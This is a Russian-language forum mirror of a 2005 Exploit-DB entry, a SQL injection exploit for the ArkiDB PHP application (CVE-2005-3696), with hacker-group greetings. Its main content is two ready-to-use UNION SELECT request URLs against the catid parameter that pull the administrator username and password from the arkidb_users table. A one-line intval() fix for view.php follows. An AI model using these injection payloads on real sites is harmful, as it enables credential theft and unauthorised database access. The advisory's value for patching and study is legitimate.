- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1320
- Проверка EDB
-
- Пройдено
- Автор
- DEVIL-00
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-3696
- Дата публикации
- 2005-11-14
Код:
[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] [email protected]
[~]
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~] Devil-00
[~] www.s4a.cc << We Love You
[~] www.securitygurus.net << Love you 2 :P
[~] HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~] [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]
[~] [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~] Line 75 .. File /source/view.php
[~]
[~] $catid = $this->get('catid');
[~] Change To
[~] $catid = intval($this->get('catid'));
[~]----------------------------------------------------------------------------------------------------------
[~] milw0rm.com [2005-11-14]
- Источник
- www.exploit-db.com